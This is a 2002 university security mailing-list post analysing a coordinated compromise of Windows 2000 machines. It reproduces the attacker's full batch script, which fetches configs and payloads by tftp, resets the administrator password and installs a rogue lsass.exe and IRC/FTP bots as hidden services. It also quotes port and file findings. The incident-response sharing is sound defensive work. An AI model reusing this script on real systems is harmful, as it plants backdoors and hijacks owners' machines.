[unisog] Re: Coordinated Scan

Jeff Bollinger jeff01 at email.unc.edu
Mon Apr 1 14:48:28 GMT 2002

More on this attack.  Here is the actual .bat file used by the attacker 
which gives some great clues:


@echo off
cd c:\winnt\system32\vmn32
mkdir \RECYCLER\S-1-5-21-2686636377-1107193052-384560437-1000
attrib +s +r +h \RECYCLER\S-1-5-21-2686636377-1107193052-384560437-1000
kill sxe*
kill temp.exe
del ..\2*.ocx
del ..\32*.ocx
del ..\temp2.exe
move firedaem.exe firedaemon.exe
del c:\winnt\system32\vmn32.exe
attrib *.* -r /s
attrib +s +h +r c:\winnt\system32\vmn32
attrib c:\winnt\system32\vmn32\asp +s +h
attrib c:\winnt\system32\vmn32\aspc +s +h
tftp -i GET ir2.conf c:\winnt\system32\vmn32\asp\ir.conf
tftp -i GET xir.conf c:\winnt\system32\vmn32\aspc\ir.conf
tftp -i GET barm8.gif c:\winnt\system32\vmn32\barm8.gif
attrib *.* -r /s
net user administrator changem
net share /delete ipc$
SET MXHOME=c:\winnt\system32\vmn32
SET MXBIN=c:\winnt\system32\vmn32
c:\winnt\system32\vmn32\firedaemon -i Ms32dll "c:\winnt\system32\vmn32"
"c:\winnt\system32\vmn32\lsass.exe" "c:\winnt\system32\vmn32\barm8.gif" Y 0
0 Y Y
c:\winnt\system32\vmn32\firedaemon -i SVHOST "c:\winnt\system32\vmn32\asp"
"c:\winnt\system32\vmn32\asp\ir.conf" Y 0 0 Y Y
c:\winnt\system32\vmn32\firedaemon -i MSVC5  "c:\winnt\system32\vmn32\aspc"
"c:\winnt\system32\vmn32\aspc\ir.conf" Y 0 0 Y Y
c:\winnt\system32\vmn32\services start Ms32dll
c:\winnt\system32\vmn32\services start SVHOST
c:\winnt\system32\vmn32\services start MSVC5
echo REGEDIT4  1>>root.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\] >> root.reg
echo "restrictanonymous"="1" >> root.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\TelnetServer\1.0\] >> root.reg
echo "NTLM"="2" >> root.reg
regedit /S root.reg
del root.reg
services stop tlntsvr
services delete tlntsvr
services stop lmhosts
services start lmhosts
services start NtLmSsp
services stop PSEXESVC
services delete PSEXESVC

Allen Chang wrote:

> Apologies if I break the thread...
> Here's my analysis of the compromised computers. First of all, this is not
> the Backdoor.darkIRC detected by antivirus programs. This backdoor is not
> detected by the latest NAV patterns.
> I'm guessing that these computer were compromised through the
> administrative share with no administrator password on Windows 2000.
> *A rouge lsass.exe (with a red u and a smaller green d icon) was installed as a
> service using firedaemon.exe (or firedaem.exe). You can check for it under
> Administrative Tools -> Services. The one on our hosts was called ms32dll
> *Several .tmp files and a rudl32.exe are dropped in the Startup folder but
> the .tmp  files don't seem to run.
> *Serve-U FTP, IRC and telnet servers are run on various ports. The IRC
> configurations(ir.con) seem to indicate that they are set up as XDCC
> file-serving bots.
> Judging from this, one should be able to remove the service with a
> "firedaemon -u ms32dll" This seems to close all the opened ports but I am
> unsure as to what other damage may have been done.
> On all the hosts, nmap found the following ports open:
> Port       State       Service
> 132/tcp    open        cisco-sys <--tlntsvr.exe (telnet)
> 135/tcp    open        loc-srv <--svchost.exe
> 139/tcp    open        netbios-ssn <--NetBIOS sharing (normal)
> 445/tcp    open        microsoft-ds <-Windows sharing (kind of normal)
> 1025/tcp   open        listen <--mstask.exe (normal)
> 8888/tcp   open        sun-answerbook <-- sxe5.tmp (backdoor client)
> Running Vision 1.0 (www.foundstone.com) on the compromised computers
> yielded these additional ports and programs bound to them:
> 1029/tcp  <-- sxe5.tmp
> 1031/tcp <-- sxe5.tmp
> 43958/tcp <--c:\winnt\system32\vmn32\lsass.exe <-not to be confused with
> the other lsass.exe from MS
> 3112/tcp <-- c:\winnt\system32\vmn32\lsass.exe
> According to vmn\ServUStartUpLog.txt (Not confirmed)
> 3112 <-- ftp
> Hidden? (Never seen by me)
> 99/tcp <-- Backdoor command shell?
> (**Files Found**)
> C:\Documents and Settings\All Users\Start Menu\Programs\Startup
> rudl32.exe
> sxe3.tmp
> sxe4.tmp
> sxe5.tmp
> Other files mentioned at
> http://www.theorygroup.com/Archive/Unisog/2002/msg00334.html
> @llen
> Network Security
> Office of Residential Computing
> UC Berkeley

Hash: SHA1

Jeff Bollinger
University of North Carolina
IT Security Analyst
105 Abernethy Hall
mailto: jeff_bollinger at unc dot edu
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org


More information about the unisog mailing list